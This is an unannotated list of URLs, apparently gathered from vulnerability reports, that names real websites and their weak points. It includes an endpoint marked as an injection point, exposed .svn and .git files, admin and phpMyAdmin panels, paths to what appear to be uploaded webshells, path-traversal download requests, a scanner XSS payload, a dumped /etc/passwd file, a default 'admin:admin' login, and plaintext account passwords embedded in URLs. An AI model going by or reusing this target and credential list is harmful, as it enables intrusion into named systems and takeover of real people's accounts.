http://**.**.**.**/ http://**.**.**.**:8080/MyJsp.jsp http://www.ticket2010.com/zhuanti_vote.aspx?subId=61 http://www.ticket2010.com/ZhuanTi.ashx?Function=Toupiao&subid=61&pollid= http://**.**.**.**/personReg.do?param=643e4fd1a2b4eaaf http://**.**.**.**/changePassword.do?key=1be43bd9d6e4ce9c-2188324cca3173e9469ea19382000f6e http://**.**.**.**/personReg.do?param=643e4fd1a2b4eaaf http://**.**.**.**/changePassword.do?key=643e4fd1a2b4eaaf-2188324cca3173e9469ea19382000f6e http://mantis.social-touch.com/view_all_bug_page.php http://**.**.**.**/index.htm http://**.**.**.**/homepage/LoginHomepage.jsp?hpid=7&isfromportal=1&templateId=5&null&templateId=5&null http://mp.wxfenxiao.com/Order/lists/city_id/110100 http://hi.mop.com/space/452514055# http://hi.mop.com/sns/add-follow http://www.ljabc.com.cn/classroom/classroom.html www.ljabc.com.cn http://119.254.102.120:8080/111.php http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/dc/orgWebList.do?action=searchOrgList&websitId=100&netTypeId=2&corporateType=1 http://**.**.**.**/wssb/wssb/shenbao/xmsbIframeList.do?action=webList&pageSize=6&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbIframeList.do?action=webList&pageSize=6&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&pjAbc1=42&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&websitId=100&netTypeId=2&&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/searchConsult.do?typeStatus=1&isanswer=2&wayType=1&title= http://**.**.**.**/wssb/wssb/shenbao/searchConsult.do?typeStatus=1&isanswer=2&wayType=1&title= http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&pjAbc1=42&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&websitId=100&netTypeId=2&&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?dictionid=8601&action=webList&pjAbc1=42&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?dictionid=8601&action=webList&pjAbc1=42&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/dc/orgWebList.do?action=searchOrgList&status=2&websitId=100&corporateType=1&netTypeId=2&order=foundDate®istrationDeptCode= http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?dictionid=8601&action=webList&pjAbc1=42&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/dc/orgWebList.do?action=searchOrgList&status=2&websitId=100&corporateType=1&netTypeId=2&order=foundDate®istrationDeptCode= http://**.**.**.**/wssb/wssb/shenbao/xmsbIframeList.do?action=webList&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&pageSize=6&shenhe=2&shenheLevel=2&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/msZuixinfabu.do?action=iframeList&type=2&pjAbc1=42&websitId=100&netTypeId=2&t= http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=no&t= http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeList2.do?action=iframeList&pageSize=5&type=1&pjAbc1=42&websitId=100&netTypeId=2&t= http://**.**.**.**/wssb/wssb/shenbao/xmsbIframeList.do?action=webList&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&pageSize=6&shenhe=2&shenheLevel=2&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeListC2.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=yes http://**.**.**.**/wssb/wssb/njxxgb/publishedView.do?action=publishedView&id=1000038958&catalogpara=N01&application=mjzz&instanceid=N0114022642066 http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeListC.do?action=webList&pageSize=6&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=yes http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&pjAbc1=42&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/searchConsult.do?typeStatus=1&isanswer=2&wayType=1&title= http://**.**.**.**/wssb/wssb/shenbao/searchConsult.do?typeStatus=1&isanswer=2&wayType=1&title= http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&pjAbc1=42&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeListP.do?action=webList&pageSize=6&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeListP.do?action=webList&pageSize=6&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeList2.do?action=iframeList&pageSize=5&type=1&pjAbc1=42&websitId=100&netTypeId=2 http://**.**.**.**/wssb/wssb/shenbao/xmsbQueryList.do?action=xmsbQueryList&shenhe=2&pjAbc1=42&websitId=100&netTypeId=2&ssfs=&fwly= http://**.**.**.**/wssb/wssb/shenbao/xmsbQueryList.do?action=xmsbQueryList&shenhe=2&pjAbc1=42&websitId=100&netTypeId=2&ssfs=&fwly=&hdfs=&xmmc=&hddy= http://**.**.**.**/wssb/wssb/shenbao/xmsbQueryList.do?action=xmsbQueryList&shenhe=2&pjAbc1=42&websitId=100&netTypeId=2&ssfs=&fwly=&hdfs= http://**.**.**.**/wssb/wssb/shenbao/xmfbList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&pjAbc1=42&netTypeId=2&from=gongwang&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbQueryList.do?action=xmsbQueryList&shenhe=2&pjAbc1=42&websitId=100&netTypeId=2&ssfs=&fwly= http://**.**.**.**/bugs/wooyun-2010-082150 http://**.**.**.**/st/qianfei/st_qianfei_index_a.aspx www.ljabc.com.cn http://220.178.0.94/tk/ http://220.178.0.94/tk/manage/login.aspx http://220.178.0.94/tk/upload/201509199859.aspx http://tripshow.com:80/ http://**.**.**.**/ http://www.51piao.com/Member/PointProductList.aspx?PointProductTypeId=22&Name= http://www.51piao.com/Member/PointProductList.aspx?PointInfo=1000,8000 http://**.**.**.**/members/union/searchSchoolAction.do?action=doNewSearchSchools&type=3&areaId=&keyword= http://**.**.**.**/members/info/job/postAction.do?action=doPostSearch http://**.**.**.**:8080/servlet/view?qid=1 http://**.**.**.**:8080/servlet/edit?qid=1 http://**.**.**.**:8080/servlet/kbview?qid=1 http://**.**.**.**:8080/servlet/kbedit?qid=1 http://**.**.**.**:8080/servlet/kbdelquestion?qid=0 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=1 http://**.**.**.**:8080/servlet/keywordDelServlet?kid=0 http://**.**.**.**/adv_search/all_search.jsp?keywords= http://**.**.**.**/list.jsp?info_type=sm http://comment.10jqka.com.cn/api/stock/index.php?module=concept&code=882030&name= http://**.**.**.**/modul/webcon!findTypeLi.action?type=8&num=200 https://github.com/crazycoody/msg-hub/blob/a9dc08c28577380b9f0b702c87737fadf932a12c/msg-plugin-service/src/test/java/cn/homecredit/msg/plugin/internal/DefaultHttpHelperIT.java http://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=6 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=6 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=6 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=2 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/saec-point/servicesheetlook.aspx?billno=1374092&no=3 http://www.huayiweibo.com/ http://**.**.**.**/index.aspx http://**.**.**.**/images/20150919105843648.aspx http://**.**.**.**/sc/media_news_detail.php?id=5480 http://219.141.188.51/ http://**.**.**.**/other/zhanwei.php?zph_id=59 URL:http://**.**.**.**/list.asp http://**.**.**.**/default.aspx http://**.**.**.**/minetypes_arr.php http://crm.chinawutong.com http://**.**.**.**/DBWechat/weixin/network.do?mhd=getcity&provinceid=1 http://mg.cmge.com/.svn/entries http://oss.cmge.com/.svn/entries http://user.cmge.com/.svn/entries https://**.**.**.**/hcsoft/lijiang-xinnonghe/blob/faf58fc9425d79ae384b25ddc8a818893a855c70/document/dizhi.txt jdbc:oracle:thin:@**.**.**.**:1521:orcl http://m.job168.com http://m.job168.com/channel/gzjz/list.jsp?board=1&page=2 http://m.job168.com:80/ www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29 m.job168.com/sign/hrmanagement/index.html B96D24EE2A880B237EBD57F09FF3F250:FG=1 http://**.**.**.**:80/ https://117.121.10.35/.git/config http://library.suda.edu.cn/infoDetail.action?id=625&type_id=2 http://www.lib.hustwb.edu.cn/lib_cj/wedit.php?where=B http://www.lib.hustwb.edu.cn/lib_cj/category.php?action=cat_edit&id=826 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.hanqing.ruc.edu.cn/artice_list.php?class=gjjl&iClassID=34 http://**.**.**.**/search?q= http://**.**.**.** http://220.178.0.94/tk/manage/login.aspx http://www.lib.hustwb.edu.cn/lib_cj/wedit.php?where=N http://**.**.**.**/ http://**.**.**.**/service/service_jsp_catid_222.html http://www.waawo.cn/shops/network.php?province=16&city=226 http://www.waawo.cn/shops/purchase_area_offline.php?province=2&city=52&p=1 http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_college.aspx http://zjc.sicnu.edu.cn http://w.2177s.com:80/ https://112.126.83.148/phpMyAdmin/phpMyAdmin/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash URL:http://httpd.apache.org/docs/2.2/ URL:http://httpd.apache.org/docs/2.2/mod/directives.html http://112.124.212.5/index.php/Ask/index/type/3 http://210.75.250.227/www.zip URL:http://**.**.**.**/add.asp http://**.**.**.**/about.aspx?id=2 http://eps.zzvcom.com/library/editornew/Editor/temp.asp http://eps.zzvcom.com/library/editornew/Editor/newimage/201591919503448968.asp http://**.**.**.**/channel.php?id=1 http://www.huozhan.com/ArticlesAction_detail.do?ID=187 http://www.saike.com/official/questions/question_view.php?question_id=3402 http://www.saike.com/official/questions/question_view.php?question_id=3402 http://**.**.**.**/Detail.aspx?userId=602&ID=402132 http://**.**.**.**/Detail.aspx?userId=574&ID=391831 http://**.**.**.**/Detail.aspx?userId=578&ID=398626 http://**.**.**.**/Detail.aspx?userId=602&ID=402132 http://**.**.**.**/Detail.aspx?userId=574&ID=391831 http://**.**.**.**/Detail.aspx?userId=578&ID=398626 http://**.**.**.**/Detail.aspx?userId=32&ID=409211 http://**.**.**.**/Detail.aspx?userId=580&ID=423092 http://**.**.**.**/Detail.aspx?userId=572&ID=405651 http://**.**.**.**/Detail.aspx?userId=600&ID=388951 http://**.**.**.**/Detail.aspx?userId=577&ID=403264 http://**.**.**.**/Detail.aspx?userId=570&ID=405517 http://**.**.**.**/Detail.aspx?userId=573&ID=404288 http://**.**.**.**/Detail.aspx?userId=531&ID=409953 http://**.**.**.**/Detail.aspx?userId=449&ID=410465 http://**.**.**.**/Detail.aspx?userId=368&ID=410590 http://**.**.**.**/Detail.aspx?userId=283&ID=393657 http://**.**.**.**/Detail.aspx?userId=535&ID=389329 http://**.**.**.**/Detail.aspx?userId=370&ID=381071 http://**.**.**.**/Detail.aspx?userId=369&ID=419152 http://**.**.**.**/Detail.aspx?userId=366&ID=402010 http://**.**.**.**/Detail.aspx?userId=272&ID=403909 http://**.**.**.**/Detail.aspx?userId=420&ID=388587 http://**.**.**.**/Detail.aspx?userId=371&ID=424203 http://**.**.**.**/Detail.aspx?userId=525&ID=393281 http://**.**.**.**/Detail.aspx?userId=501&ID=424273 http://**.**.**.**/Detail.aspx?userId=480&ID=412523 http://**.**.**.**/Detail.aspx?userId=520&ID=394281 http://**.**.**.**/Detail.aspx?userId=424&ID=403935 http://**.**.**.**/Detail.aspx?userId=252&ID=393186 http://**.**.**.**/Detail.aspx?userId=509&ID=383270 http://**.**.**.**/Detail.aspx?userId=232&ID=424326 http://**.**.**.**/Detail.aspx?userId=453&ID=411612 http://**.**.**.**/Detail.aspx?userId=483&ID=423747 http://**.**.**.**/Detail.aspx?userId=444&ID=394227 http://**.**.**.**/Detail.aspx?userId=514&ID=422104 http://**.**.**.**/Detail.aspx?userId=198&ID=395524 http://**.**.**.**/Detail.aspx?userId=423&ID=423981 http://**.**.**.**/Detail.aspx?userId=409&ID=409420 http://**.**.**.**/Detail.aspx?userId=315&ID=392851 http://**.**.**.**/Detail.aspx?userId=109&ID=393168 http://**.**.**.**/Detail.aspx?userId=123&ID=410531 http://**.**.**.**/Detail.aspx?userId=485&ID=393869 http://**.**.**.**/Detail.aspx?userId=403&ID=392921 http://**.**.**.**/Detail.aspx?userId=93&ID=419045 http://**.**.**.**/Detail.aspx?userId=417&ID=361816 http://**.**.**.**/Detail.aspx?userId=481&ID=392006 http://**.**.**.**/Detail.aspx?userId=512&ID=393005 http://**.**.**.**/Detail.aspx?userId=517&ID=372139 http://**.**.**.**/Detail.aspx?userId=431&ID=418078 http://**.**.**.**/Detail.aspx?userId=35&ID=411785 http://**.**.**.**/Detail.aspx?userId=452&ID=392941 http://**.**.**.**/Detail.aspx?userId=455&ID=395799 http://**.**.**.**/Detail.aspx?userId=205&ID=394727 http://**.**.**.**/Detail.aspx?userId=484&ID=403185 http://**.**.**.**/Detail.aspx?userId=170&ID=391826 http://**.**.**.**/Detail.aspx?userId=450&ID=422454 http://**.**.**.**/Detail.aspx?userId=447&ID=424135 http://**.**.**.**/Detail.aspx?userId=479&ID=423717 http://**.**.**.**/Detail.aspx?userId=51&ID=412579 http://**.**.**.**/Detail.aspx?userId=141&ID=424329 http://**.**.**.**/Detail.aspx?userId=500&ID=371575 http://**.**.**.**/Detail.aspx?userId=434&ID=411646 http://**.**.**.**/Detail.aspx?userId=422&ID=416760 http://**.**.**.**/Detail.aspx?userId=482&ID=411664 http://**.**.**.**/Detail.aspx?userId=524&ID=423827 http://**.**.**.**/Detail.aspx?userId=19&ID=424144 http://**.**.**.**/Detail.aspx?userId=374&ID=407424 http://**.**.**.**/Detail.aspx?userId=20&ID=424314 http://**.**.**.**/Detail.aspx?userId=416&ID=422140 http://**.**.**.**/Detail.aspx?userId=80&ID=423160 http://**.**.**.**/Detail.aspx?userId=24&ID=393399 http://**.**.**.**/Detail.aspx?userId=134&ID=391985 http://**.**.**.**/Detail.aspx?userId=199&ID=408524 http://**.**.**.**/Detail.aspx?userId=488&ID=417377 http://**.**.**.**/Detail.aspx?userId=426&ID=424243 http://**.**.**.**/Detail.aspx?userId=2&ID=415121 http://**.**.**.**/Detail.aspx?userId=559&ID=423740 http://**.**.**.**/Detail.aspx?userId=432&ID=402933 http://**.**.**.**/Detail.aspx?userId=355&ID=424061 http://**.**.**.**/Detail.aspx?userId=532&ID=390138 http://**.**.**.**/Detail.aspx?userId=33&ID=393417 http://**.**.**.**/Detail.aspx?userId=448&ID=408532 http://**.**.**.**/Detail.aspx?userId=511&ID=424249 http://**.**.**.**/Detail.aspx?userId=513&ID=409707 http://**.**.**.**/Detail.aspx?userId=231&ID=373617 http://**.**.**.**/Detail.aspx?userId=124&ID=423859 http://**.**.**.**/Detail.aspx?userId=601&ID=394582 http://**.**.**.**/Detail.aspx?userId=27&ID=415571 http://**.**.**.**/Detail.aspx?userId=30&ID=386533 http://**.**.**.**/Detail.aspx?userId=529&ID=409599 http://**.**.**.**/Detail.aspx?userId=39&ID=424311 http://**.**.**.**/Detail.aspx?userId=88&ID=424278 http://**.**.**.**/Detail.aspx?userId=155&ID=404096 http://**.**.**.**/Detail.aspx?userId=90&ID=424261 http://**.**.**.**/Detail.aspx?userId=478&ID=421395 http://**.**.**.**/Detail.aspx?userId=227&ID=362710 http://**.**.**.**/Detail.aspx?userId=34&ID=401604 http://**.**.**.**/Detail.aspx?userId=584&ID=394569 http://**.**.**.**/Detail.aspx?userId=659&ID=423780 http://**.**.**.**/Detail.aspx?userId=4&ID=385681 http://**.**.**.**/Detail.aspx?userId=178&ID=408840 http://**.**.**.**/Detail.aspx?userId=176&ID=407146 http://**.**.**.**/Detail.aspx?userId=598&ID=422280 http://**.**.**.**/Detail.aspx?userId=263&ID=412933 http://**.**.**.**/Detail.aspx?userId=590&ID=399617 http://**.**.**.**/Detail.aspx?userId=249&ID=420490 http://**.**.**.**/Detail.aspx?userId=589&ID=412494 http://**.**.**.**/Detail.aspx?userId=408&ID=394194 http://**.**.**.**/Detail.aspx?userId=518&ID=388824 http://**.**.**.**/Detail.aspx?userId=37&ID=423298 http://**.**.**.**/Detail.aspx?userId=580&ID=423092 http://**.**.**.**/Detail.aspx?userId=599&ID=392240 http://**.**.**.**/Detail.aspx?userId=594&ID=424218 http://**.**.**.**/Detail.aspx?userId=14&ID=389861 http://**.**.**.**/Detail.aspx?userId=593&ID=412862 http://**.**.**.**/Detail.aspx?userId=544&ID=424259 http://**.**.**.**/Detail.aspx?userId=591&ID=397822 http://**.**.**.**/Detail.aspx?userId=579&ID=414104 http://**.**.**.**/Detail.aspx?userId=564&ID=412530 http://**.**.**.**/Detail.aspx?userId=560&ID=393395 http://**.**.**.**/Detail.aspx?userId=221&ID=396203 http://**.**.**.**/Detail.aspx?userId=347&ID=392378 http://**.**.**.**/Detail.aspx?userId=581&ID=415785 http://**.**.**.**/Detail.aspx?userId=592&ID=424331 http://**.**.**.**/Detail.aspx?userId=557&ID=382345 http://**.**.**.**/Detail.aspx?userId=470&ID=419685 http://**.**.**.**/Detail.aspx?userId=541&ID=418467 http://**.**.**.**/Detail.aspx?userId=31&ID=389968 http://**.**.**.**/Detail.aspx?userId=182&ID=424114 http://**.**.**.**/Detail.aspx?userId=597&ID=411362 http://**.**.**.**/Detail.aspx?userId=558&ID=424231 http://**.**.**.**/Detail.aspx?userId=492&ID=412549 http://**.**.**.**/Detail.aspx?userId=603&ID=424227 http://**.**.**.**/Detail.aspx?userId=438&ID=394212 http://**.**.**.**/Detail.aspx?userId=583&ID=409855 http://**.**.**.**/Detail.aspx?userId=551&ID=412564 http://**.**.**.**/Detail.aspx?userId=507&ID=419491 http://**.**.**.**/Detail.aspx?userId=569&ID=406214 http://**.**.**.**/Detail.aspx?userId=588&ID=392650 http://**.**.**.**/Detail.aspx?userId=442&ID=424146 http://**.**.**.**/Detail.aspx?userId=441&ID=422154 http://**.**.**.**/Detail.aspx?userId=559&ID=423854 http://**.**.**.**/Detail.aspx?userId=451&ID=402887 http://**.**.**.**/Detail.aspx?userId=549&ID=395520 http://**.**.**.**/Detail.aspx?userId=546&ID=380847 http://**.**.**.**/Detail.aspx?userId=548&ID=409971 http://**.**.**.**/Detail.aspx?userId=598&ID=412667 http://**.**.**.**/Detail.aspx?userId=585&ID=409983 http://**.**.**.**/Detail.aspx?userId=555&ID=394388 http://**.**.**.**/Detail.aspx?userId=540&ID=409954 http://**.**.**.**/Detail.aspx?userId=554&ID=409844 http://**.**.**.**/Detail.aspx?userId=586&ID=412495 http://**.**.**.**/Detail.aspx?userId=563&ID=394402 http://**.**.**.**/Detail.aspx?userId=575&ID=412534 http://**.**.**.**/Detail.aspx?userId=567&ID=394437 http://**.**.**.**/Detail.aspx?userId=566&ID=394417 http://**.**.**.**/Detail.aspx?userId=565&ID=410994 http://**.**.**.**/Detail.aspx?userId=542&ID=423225 http://**.**.**.**/Detail.aspx?userId=561&ID=388396 http://**.**.**.**/Detail.aspx?userId=536&ID=393351 http://**.**.**.**/Detail.aspx?userId=553&ID=422942 http://**.**.**.**/Detail.aspx?userId=538&ID=394309 http://**.**.**.**/Detail.aspx?userId=439&ID=411650 http://**.**.**.**/Detail.aspx?userId=522&ID=424189 http://**.**.**.**/Detail.aspx?userId=84&ID=361557 http://**.**.**.**/Detail.aspx?userId=516&ID=408936 http://**.**.**.**/Detail.aspx?userId=543&ID=394321 http://**.**.**.**/Detail.aspx?userId=556&ID=404432 http://**.**.**.**/Detail.aspx?userId=193&ID=393377 http://**.**.**.**/Detail.aspx?userId=153&ID=396006 http://**.**.**.**/Detail.aspx?userId=562&ID=393367 http://**.**.**.**/Detail.aspx?userId=391&ID=367193 http://**.**.**.**/Detail.aspx?userId=496&ID=394271 http://**.**.**.**/Detail.aspx?userId=415&ID=387645 http://**.**.**.**/Detail.aspx?userId=527&ID=404713 http://**.**.**.**/Detail.aspx?userId=433&ID=411737 http://**.**.**.**/Detail.aspx?userId=497&ID=411142 http://**.**.**.**/Detail.aspx?userId=461&ID=392895 http://**.**.**.**/Detail.aspx?userId=23&ID=403905 http://**.**.**.**/Detail.aspx?userId=290&ID=423310 http://**.**.**.**/Detail.aspx?userId=20&ID=424054 http://**.**.**.**/Detail.aspx?userId=504&ID=416193 http://**.**.**.**/Detail.aspx?userId=325&ID=424281 http://**.**.**.**/Detail.aspx?userId=491&ID=423971 http://**.**.**.**/Detail.aspx?userId=427&ID=416972 http://**.**.**.**/Detail.aspx?userId=358&ID=411027 http://**.**.**.**/Detail.aspx?userId=7&ID=424169 http://**.**.**.**/Detail.aspx?userId=150&ID=393789 http://**.**.**.**/Detail.aspx?userId=47&ID=410018 http://**.**.**.**/Detail.aspx?userId=428&ID=424267 http://**.**.**.**/Detail.aspx?userId=180&ID=372853 http://**.**.**.**/Detail.aspx?userId=397&ID=402913 http://**.**.**.**/Detail.aspx?userId=258&ID=404140 http://**.**.**.**/Detail.aspx?userId=359&ID=408169 http://**.**.**.**/Detail.aspx?userId=411&ID=402875 http://**.**.**.**/Detail.aspx?userId=367&ID=392884 http://**.**.**.**/Detail.aspx?userId=309&ID=392036 http://**.**.**.**/Detail.aspx?userId=477&ID=389777 http://**.**.**.**/Detail.aspx?userId=487&ID=424057 http://**.**.**.**/Detail.aspx?userId=351&ID=424276 http://**.**.**.**/Detail.aspx?userId=298&ID=391893 http://**.**.**.**/Detail.aspx?userId=351&ID=423979 http://**.**.**.**/Detail.aspx?userId=550&ID=424304 http://**.**.**.**/Detail.aspx?userId=400&ID=396903 http://**.**.**.**/Detail.aspx?userId=445&ID=416210 URL:http://shop.blued.cn http://luqiao.zjol.com.cn/sjh5/creative/bg/display.asp?classname2=%D0%C2%B0%B2%CE%F7%BD%D6&picid=2780 http://comment.aili.com//index.php?a=comment_sustain&cid=12 http://www.jsums.cn/admin/login.php http://**.**.**.**/index.php?m=Product&a=index&sex=1&sports=13&pclass=4存在注入点 http://**.**.**.**/pingjia_pic.jsp?pid=0&colid=18496 http://**.**.**.**/znss_zmm.jsp http://**.**.**.**/cjgklq2015cx2.jsp?pid=18500&id=112191 http://**.**.**.**/mstkcx2.jsp?pid=18474&id=110786 http://**.**.**.**/cjgklq2015cx2.jsp?pid=18500&id=112191 http://**.**.**.**/mstkcx2.jsp?pid=18474&id=110786 http://**.**.**.**/yjs2011cx2.jsp?pid=18500&id=11213 http://**.**.**.**/image.jsp?a= http://**.**.**.**/columnxx.jsp?pid=19041&colid=19042 http://**.**.**.**/html/news/article.asp?cid=18&top=6&asize=20 http://**.**.**.**/3G/ccompanynew.asp?cid=672677 http://**.**.**.**/html/news/article.asp?cid=18&top=30&asize=12&isdt=y http://**.**.**.**/html/personal/Search_List3.asp?zw=1900&page=2 http://**.**.**.**/3G/ccompanynew.asp?cid=635573 http://**.**.**.**/Default.aspx www.vcanbio.com http://www.ku6.com/?account=cuixuesong&expire=on&password=wangqiao521@&x=47&y=18 http://www.ku6.com/?account=z439912678@163.com&expire=on&password=Zhao521%2B.%3F&x=0&y=0 http://admin.ljabc.com.cn/bull/toBullAuthentication.html http://**.**.**.**/index.php?c=article&a=type&tid=48 http://**.**.**.**/index.php?c=article&a=type&tid=48 http://oa.mfc.com.cn:81/ http://office.galaxyasset.com/tools/SWFUpload/upload.jsp https://**.**.**.**/hcsoft/lijiang-xinnonghe/blob/faf58fc9425d79ae384b25ddc8a818893a855c70/document/dizhi.txt http://www.nongfadai.com/password/ http://www.e-bridge.com.cn/ http://bhwsw.91huayi.com/page/pagel3.aspx?lm=1234 http://jcm.91huayi.com/login.aspx admin:admin http://www.huayiyuan.com/admincp.php http://bi.cisg.cn/biportal/index.jsp http://bi.cisg.cn/biportal/index.jsp http://www http://**.**.**.**/yuanyi/login/index.aspx http://**.**.**.**/help.asp http://**.**.**.**/WebSite/Default.aspx http://**.**.**.**/ http://job.shangdu.com/info.php?id=1 http://**.**.**.**:8081/WebNewsPaper.aspx?ID=20150203-A1 www.800bestex.com http://www.800bestex.com http://**.**.**.**/search.asp https://github.com/WillGuan105/myUpTime/blob/d46dff76c2265c3774f292b2204aaf57ea08cc4e/config/default.yaml_mls http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../web.xml http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../classes/log4j.xml http://www.firefox.com.cn/ http://mozilla.com.cn/foxletter/verify/8a460d34f3e49868b67aa3d6f02202/ http://mozilla.com.cn/foxletter/verify/e90bb501f1e24adae4a3f711055a10/ http://broker2.esf.leju.com/login 